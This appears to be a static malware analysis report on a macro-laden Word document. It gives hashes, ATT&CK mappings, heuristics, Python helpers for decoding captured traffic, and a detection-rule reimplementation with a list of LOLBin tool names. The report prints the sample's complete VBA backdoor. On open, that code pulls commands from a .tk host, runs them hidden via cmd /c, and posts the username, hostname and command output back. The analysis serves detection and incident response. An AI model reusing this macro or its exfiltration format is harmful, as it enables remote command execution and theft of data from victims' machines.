Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 06989fa099ae5256…

MALICIOUS

Office (OLE)

Size: 48.0 KB
Created: 2018-05-14 16:51:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: ec440b034e249418a7978dea8658bf9e
SHA-1: a8980b38e45dda4cee595b94e78e6d70d02ce92b
SHA-256: 06989fa099ae5256e541ae433c998bc9c25b378d4e0d9252f6d4b310a3fed7e1
Risk score: 350

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File T1566.001 Spearphishing Attachment T1071.001 Web Protocols T1033 System Owner/User Discovery T1082 System Information Discovery T1041 Exfiltration Over C2 Channel

The sample carries a VBA project whose Document_Open subroutine, gated on a Win32/Win64 compile-time check (IsW), calls getImage. getImage issues an HTTP GET with WinHttp.WinHttpRequest.5.1 to http://wqopsakl.tk/forms/forms_0228.php (the host is assembled at run time from "http://", "wqopsakl" and ".tk/..." fragments, so the full URL never appears as a single string), strips non-printable characters from the response (cleanStr), base64-decodes it through an MSXML2 bin.base64 node (mdecode) and splits the result on commas into a command list. getFormData runs each command hidden via WScript.Shell.Run as "cmd /c <command> > <temp file>", reads the output back with ADODB.Stream and deletes the temp file. The username (%USERNAME%), the hostname (WScript.Network.ComputerName) and every command/output pair are then base64-encoded (mencode, over the UTF-16LE bytes of the report string) and POSTed to the same URL. The document is therefore a lightweight web-based command-execution backdoor rather than a plain downloader; the intrinsic Shell() function is never called, the execution primitive is objShell.Run. If every command succeeded (AnyFailure is False), Application.OnTime schedules getImageLast one second later, which leaves reading layout and replaces the shapes tagged "warning_image"/"error_image" with a linked picture fetched from http://wqopsakl.tk/images/image1_2ce8.jpeg, i.e. the lure swaps its decoy image once the macro has run. The URL http://wqopsakl.tk/images/error_image_e5bf.png was extracted from the document body, not from the macro; its name is consistent with the "error_image" decoy the macro deletes, and it remains a useful network indicator alongside the forms_0228.php tasking endpoint.
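To make the exchange concrete, here is an added Python model of the tasking and reporting format implied by getImage, getFormData, mdecode and mencode. It is not code from the sample or from this report: the sample tasking string is constructed, because the real response from forms_0228.php was not captured, and the UTF-16LE encoding of the POST body follows from VBA's String-to-Byte-array assignment (cob = co) rather than from anything the server is known to expect.

```python
from __future__ import annotations

import base64
import re
from typing import Optional

CRLF = "\r\n"

# Constructed sample tasking. Assumption: the real response body from
# http://wqopsakl.tk/forms/forms_0228.php was not captured for this report; the
# macro only needs base64 text that decodes to a comma-separated command list.
SAMPLE_TASKING = base64.b64encode(b"whoami,ipconfig /all").decode("ascii")


def decode_tasking(response_text: str) -> list[str]:
    """Mirror getImage(): cleanStr() keeps only bytes 33..126, mdecode() base64-decodes
    through an MSXML bin.base64 node, StrConv(..., vbUnicode) reads the bytes as ANSI
    text, and Split(clist, ",") yields the commands that getFormData() then runs as
    'cmd /c <command> > <temp file>'."""
    clean = "".join(ch for ch in response_text if 32 < ord(ch) < 127)
    if not clean:
        return []            # the macro skips the whole loop on an empty body
    return base64.b64decode(clean).decode("latin-1").split(",")


def build_exfil(username: str, hostname: str,
                results: list[tuple[str, Optional[str]]]) -> str:
    """Rebuild the POST body the way getImage() assembles it. An output of None
    models getFormData()'s failure branch ("Unable to read data"). The report
    string is copied into a Byte array, which in VBA yields UTF-16LE, and then
    base64-encoded by mencode()."""
    report = f"USERNAME: {username}{CRLF}HOSTNAME: {hostname}{CRLF}"
    for cmd, output in results:
        if output is None:
            chunk = "Unable to read data"
        else:
            # getFormData(): CRLF + cmd + CRLF + "OUTPUT: " + CRLF + output + CRLF
            chunk = f"{CRLF}{cmd}{CRLF}OUTPUT: {CRLF}{output}{CRLF}"
        report += f"COMMAND: {CRLF}{chunk}"
    return base64.b64encode(report.encode("utf-16-le")).decode("ascii")


def parse_exfil(post_body: str) -> dict:
    """Decode a captured POST body back into username, hostname and (command, output)
    pairs, so a proxy capture of this beacon can be read without running the macro."""
    text = base64.b64decode(post_body).decode("utf-16-le")
    head, *chunks = text.split("COMMAND: " + CRLF)
    fields = dict(re.findall(r"^(USERNAME|HOSTNAME): (.*?)\r?$", head, re.M))
    results = []
    for chunk in chunks:
        m = re.match(r"\r\n(.*?)\r\nOUTPUT: \r\n(.*)\r\n$", chunk, re.S)
        if m:
            results.append((m.group(1), m.group(2)))
        else:
            results.append(("<unparsed>", chunk.strip()))   # e.g. the failure string
    return {"username": fields.get("USERNAME"),
            "hostname": fields.get("HOSTNAME"),
            "results": results}


if __name__ == "__main__":
    print(decode_tasking(SAMPLE_TASKING))
    body = build_exfil("alice", "WS01", [("whoami", "ws01\\alice"), ("dir", None)])
    print(parse_exfil(body))
```

Run decode_tasking over a captured GET response body and parse_exfil over a captured POST body to recover what the operator asked for and what left the host. Both directions use the same URL, so one proxy-log filter on /forms/forms_0228.php catches tasking and exfiltration alike; a POST to that path is a confirmed execution, not just an open.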

Heuristics 10

  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA (note: the matched lines create a WScript.Shell object; the macro never calls the intrinsic Shell() function. The actual execution primitive is objShell.Run in getFormData, shown under the cmd.exe finding below.)
    Matched line in script
    Function getName()
        Set wshShell = CreateObject("WScript.Shell")
        getName = wshShell.ExpandEnvironmentStrings("%USERNAME%")
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Function getName()
        Set wshShell = CreateObject("WScript.Shell")
        getName = wshShell.ExpandEnvironmentStrings("%USERNAME%")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Function getName()
        Set wshShell = CreateObject("WScript.Shell")
        getName = wshShell.ExpandEnvironmentStrings("%USERNAME%")
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
        objTempFile = objName
        objShell.Run "cmd /c " + form_input + " > " + objTempFile, 0, True
        If objFSO.FileExists(objTempFile) Then
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Dim AnyFailure As Boolean
    Sub Document_Open()
       On Error GoTo top_error
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://wqopsakl.tk/images/error_image_e5bf.png  In document text (OLE body)
    URL http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body)
    URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography  In document text (OLE body)
    URL http://schemas.openxmlformats.org/officeDocument/2006/customXml  In document text (OLE body)
    The three schemas.openxmlformats.org entries are standard OOXML namespace identifiers and occur in benign Word documents; only the wqopsakl.tk URL is an indicator. The macro's own URLs (http://wqopsakl.tk/forms/forms_0228.php and http://wqopsakl.tk/images/image1_2ce8.jpeg) are assembled at run time from "http://", "wqopsakl" and ".tk/..." fragments and therefore do not appear in this list; take them from the extracted source below.
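The SE_LOLBIN_RUN_COMMAND finding above is described as a proximity rule: a tool name within 220 characters of a dangerous flag, verb or URL in the extracted text. The following is an added Python reimplementation of that idea, not the scanner's own code; the tool and trigger lists are assumptions chosen for illustration, and the sample "string pool" text is constructed from the literals visible in this macro's source.

```python
import re

# Assumption: the scanner's actual token lists are not published in the report;
# these are a plausible subset chosen for this illustration.
TOOL_RE = re.compile(
    r"\b(?:powershell|pwsh|mshta|cmd|wscript|cscript|rundll32|regsvr32|"
    r"certutil|bitsadmin|msiexec)\b", re.I)
TRIGGER_RE = re.compile(
    r"(?:/c\b|-enc(?:odedcommand)?\b|-nop\b|-w(?:indowstyle)?\s+hidden\b|"
    r"\bdownload\w*\b|\bbypass\b|\bhttps?://\S*)", re.I)
WINDOW = 220   # characters, as stated in the SE_LOLBIN_RUN_COMMAND description


def find_lolbin_sequences(text: str, window: int = WINDOW) -> list:
    """Flag every tool-name token that has a trigger token within `window` characters
    on either side. Returns one record per tool hit with the triggers that made it fire."""
    triggers = [(m.start(), m.group(0)) for m in TRIGGER_RE.finditer(text)]
    hits = []
    for tm in TOOL_RE.finditer(text):
        near = [tok for pos, tok in triggers if abs(pos - tm.start()) <= window]
        if near:
            hits.append({"tool": tm.group(0), "offset": tm.start(), "triggers": near})
    return hits


# Constructed stand-in for the extracted-text view of this sample's VBA string pool
# (the literals from getFormData and getImage, in the order they appear in the source).
SAMPLE_STRING_POOL = (
    "WScript.Shell Scripting.FileSystemObject cmd /c  >  OUTPUT:  utf-8 "
    "ADODB.Stream wqopsakl http:// .tk/forms/forms_0228.php WinHttp.WinHttpRequest.5.1"
)

# Constructed benign text that mentions a tool name with no execution context nearby.
BENIGN_TEXT = "Open cmd from the Start menu if the wizard does not appear."


if __name__ == "__main__":
    for hit in find_lolbin_sequences(SAMPLE_STRING_POOL):
        print(hit)
    print(find_lolbin_sequences(BENIGN_TEXT))
```

On the string-pool sample both "WScript" and "cmd" fire, each with "/c" and the bare "http://" fragment as neighbours, while the benign sentence does not. The rule is deliberately loose (a help page that mentions PowerShell next to a hyperlink will also match), which is why the report rates it as corroborating evidence next to the macro findings rather than as a detection on its own.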

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6384 bytes
SHA-256: 0ab3aaee1425cd99d1a5e99b7b4ee652af4d4a233af46fcdbb2180fc84633853
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim AnyFailure As Boolean
Sub Document_Open()
   On Error GoTo top_error
   AnyFailure = False
   If (IsW() = True) Then
       Call getImage
   End If
top_error:
End Sub
Function IsW() As Boolean
#If Win64 Then
    IsW = True
#ElseIf Win32 Then
    IsW = True
#Else
    IsW = False
#End If
End Function
Function getName()
    Set wshShell = CreateObject("WScript.Shell")
    getName = wshShell.ExpandEnvironmentStrings("%USERNAME%")
End Function
Function getFormData(form_input)
    form_input = Replace(form_input, vbCr, "")
    form_input = Replace(form_input, vbLf, "")
    Set objShell = CreateObject("WScript.Shell")
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    tfolder = objFSO.GetSpecialFolder(TemporaryFolder)
    objName = objFSO.GetTempName
    objTempFile = objName
    objShell.Run "cmd /c " + form_input + " > " + objTempFile, 0, True
    If objFSO.FileExists(objTempFile) Then
        strText = vbCrLf + form_input + vbCrLf + "OUTPUT: " + vbCrLf
        Dim objStream
        Dim strData As String
        Set objStream = CreateObject("ADODB.Stream")
        objStream.Charset = "utf-8"
        objStream.Open
        objStream.LoadFromFile (objTempFile)
        strData = objStream.ReadText()
        strData = cleanLine(strData)
        strText = strText + strData + vbCrLf
        getFormData = strText
        objStream.Close
        objFSO.DeleteFile (objTempFile)
    Else
        getFormData = "Unable to read data"
        AnyFailure = True
    End If
End Function
Function cleanStr(dStr As String)
    Dim iSpCnt As Integer
    Dim AsciiVal As Integer
    iSpCnt = 0
    tempWord = ""
    For iSpCnt = 0 To Len(dStr) - 1
        AsciiVal = Asc(Mid$(dStr, iSpCnt + 1, 1))
        If (AsciiVal > 32 And AsciiVal < 127) Then
             tempWord = tempWord + Mid$(dStr, iSpCnt + 1, 1)
        End If
    Next iSpCnt
    cleanStr = tempWord
End Function

Function cleanLine(dStr As String)
    Dim iSpCnt As Integer
    Dim AsciiVal As Integer
    iSpCnt = 0
    tempWord = ""
    Dim dStrBytes() As Byte
    dStrBytes = dStr
    For iSpCnt = 0 To LenB(dStr) - 1
        CheckVal = dStrBytes(iSpCnt)
        If (CheckVal > 31 And CheckVal < 127) Then
            tempWord = tempWord + Chr(CheckVal)
        ElseIf (CheckVal = 13) Then
            tempWord = tempWord + vbCr
        ElseIf (CheckVal = 10) Then
            tempWord = tempWord + vbLf
        End If
    Next iSpCnt
    cleanLine = tempWord
End Function
Function mdecode(strData As String) As Variant
    Dim objXML As MSXML2.DomDocument60
    Dim objNode As MSXML2.IXMLDOMElement
    Set objXML = New MSXML2.DomDocument60
    Set objNode = objXML.createElement("b64")
    objNode.DataType = "bin.base64"
    objNode.Text = strData
    mdecode = objNode.nodeTypedValue
    Set objNode = Nothing
    Set objXML = Nothing
End Function
Function mencode(strData() As Byte) As String
    Dim objXML As MSXML2.DomDocument60
    Dim objNode As MSXML2.IXMLDOMElement
    Set objXML = New MSXML2.DomDocument60
    Set objNode = objXML.createElement("Base64Data")
    objNode.DataType = "bin.base64"
    objNode.nodeTypedValue = strData
    mencode = objNode.Text
    Set objNode = Nothing
    Set objXML = Nothing
End Function
Function getHN()
    Set wshNetwork = CreateObject("WScript.Network")
    getHN = wshNetwork.ComputerName
End Function
Sub getImage()
    Dim bArray() As Byte
    Dim carray() As String
    Dim cstring As String
    Dim clist As String
    Dim clc As String
    Dim co As String
    Dim WinHttpReq As Object
    Dim bstr As String
    Dim mg As String
    Dim tempStr1 As String
    On Error GoTo error
    tempStr1 = "wqopsakl"
    bstr = ""
    mg = "http://" & tempStr1 & ".tk/forms/forms_0228.php"
    Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
    WinHttpReq.Option(4) = 13056
    WinHttpReq.SetTimeouts 10000, 10000, 10000, 10000
    WinHttpReq.Open "GET", mg, False
    WinHttpReq.send
    bstr = WinHttpReq.responseText
    cstring = cleanStr(bstr)
    If (cstring <> "") Then
        bArray = mdecode(cstring)
        clist = StrConv(bArray, vbUnicode)
        carray = Split(clist, ",")
        co = "USERNAME: " + getName + vbCrLf + "HOSTNAME: " + getHN + vbCrLf
        For Each c In carray
            Dim tempOut
            tempOut = getFormData(c)
            co = co + "COMMAND: " + vbCrLf + tempOut
        Next
        Dim ce As String
        Dim cob() As Byte
        cob = co
        ce = mencode(cob)
        mp = mg
        Dim WinHttpPost As Object
        Set WinHttpPost = CreateObject("WinHttp.WinHttpRequest.5.1")
        WinHttpPost.Option(4) = 13056
        WinHttpPost.SetTimeouts 10000, 10000, 10000, 10000
        WinHttpPost.Open "POST", mp, False
        WinHttpPost.send (ce)
    End If
    If AnyFailure = False Then
        Call getImageFinal
    End If
error:
End Sub
Sub replaceImage()
    Dim tempStr1 As String
    tempStr1 = "wqopsakl"
    Dim img As InlineShape
    Dim simg As Shape
    Dim newimg As InlineShape
    For Each simg In ActiveDocument.Shapes
        If simg.AlternativeText = "warning_image" Then
            simg.Select
            simg.Delete
        End If
    Next
        
    For Each img In ActiveDocument.InlineShapes
        If img.AlternativeText = "warning_image" Then
            img.Select
            img.Delete
        End If
        
        If img.AlternativeText = "error_image" Then
           img.Select
           img.Delete
           Set newimg = Selection.InlineShapes.AddPicture(FileName:="http://" & tempStr1 & ".tk/images/image1_2ce8.jpeg", LinkToFile:=True, SaveWithDocument:=False)
           newimg.Height = 490
           newimg.Width = 306
        End If
    Next
End Sub
Sub getImageLast()
    ActiveWindow.View.ReadingLayout = False
    Call replaceImage
End Sub
Sub getImageFinal()
    Application.OnTime When:=Now + TimeValue("00:00:01"), Name:="getImageLast"
End Sub